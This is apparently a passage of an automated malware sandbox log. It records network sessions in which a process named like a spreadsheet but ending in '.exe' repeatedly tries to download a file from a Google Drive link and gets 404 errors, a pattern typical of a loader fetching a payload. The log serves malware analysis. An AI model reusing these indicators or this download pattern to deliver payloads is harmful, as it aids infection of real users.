                                                        2024-12-16 16:58:01 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 70 43 52 31 37 64 78 5a 34 5a 62 43 51 41 30 32 69 35 70 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hpCR17dxZ4ZbCQA02i5pTw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        8 | 192.168.2.8 | 49718 | 172.217.19.174 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:03 UTC | 417 | OUT | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:04 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-y8flBZiIulY4L9q4XGw8PQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        9 | 192.168.2.8 | 49719 | 142.250.181.1 | 443 | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:06 UTC | 459 | OUT | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:07 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC4ta_CaXtC6lLUGYMlr04C777LnIJVsBez3oHI8R02QCpL_I_bw84ygkOOCzszDTKFo
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:06 GMT
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-WU6cB3O4QjibIAQpY59wuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:07 UTC | 1652              | IN        | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6b 79 34 74 55 71 4f 77 6a 4b 7a 33 65 6f 6e 73 48 32 4b 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Uky4tUqOwjKz3eonsH2K4g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                        10         | 192.168.2.8 | 49720       | 172.217.19.174 | 443              | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp               | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:09 UTC | 417               | OUT       | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:10 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:09 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-_LPpUbIR7Uj50t1sj4DseQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                        11         | 192.168.2.8 | 49721       | 142.250.181.1  | 443              | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp               | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:12 UTC | 459               | OUT       | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:13 UTC | 1844              | IN        | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC79_XdwT5opJ7bv4SRS37aV6-L-mz42raFK0BeUYM8LjL7jm78EHlmU9VntEIdrP7Cc
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:12 GMT
                                                        Content-Security-Policy: script-src 'nonce-_xJZkHHIdz5WlfP4Ganjkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:13 UTC | 1652              | IN        | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 47 33 51 58 47 4f 65 4e 64 35 74 77 7a 59 37 42 59 6c 6e 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UG3QXGOeNd5twzY7BYlnug">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                        12         | 192.168.2.8 | 49722       | 172.217.19.174 | 443              | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp               | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:14 UTC | 417               | OUT       | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:15 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-hRkaLRfWx3m2o081ssvlAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                        13         | 192.168.2.8 | 49724       | 142.250.181.1  | 443              | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp               | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:17 UTC | 459               | OUT       | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:18 UTC | 1844              | IN        | HTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5lQPyB7BU66PM55OBj_X1vNiIetanHmA_JKuIcORGptSgHDW3qjNXQLp3lOXEUkgVC
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:18 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-B6wP_cAUUif2MF-q9-axJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:18 UTC | 1652              | IN        | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 46 70 64 52 55 36 67 63 57 6d 31 50 71 59 54 6e 76 5a 61 33 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0FpdRU6gcWm1PqYTnvZa3A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                        14         | 192.168.2.8 | 49725       | 172.217.19.174 | 443              | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp               | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:20 UTC | 417               | OUT       | GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:21 UTC | 1920              | IN        | HTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:20 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-5RFiIBl9iY2pPwi3cpS7KQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                        15         | 192.168.2.8 | 49726       | 142.250.181.1  | 443              | 928 | C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        Timestamp               | Bytes transferred | Direction | Data
                                                        2024-12-16 16:58:23 UTC | 459               | OUT       | GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
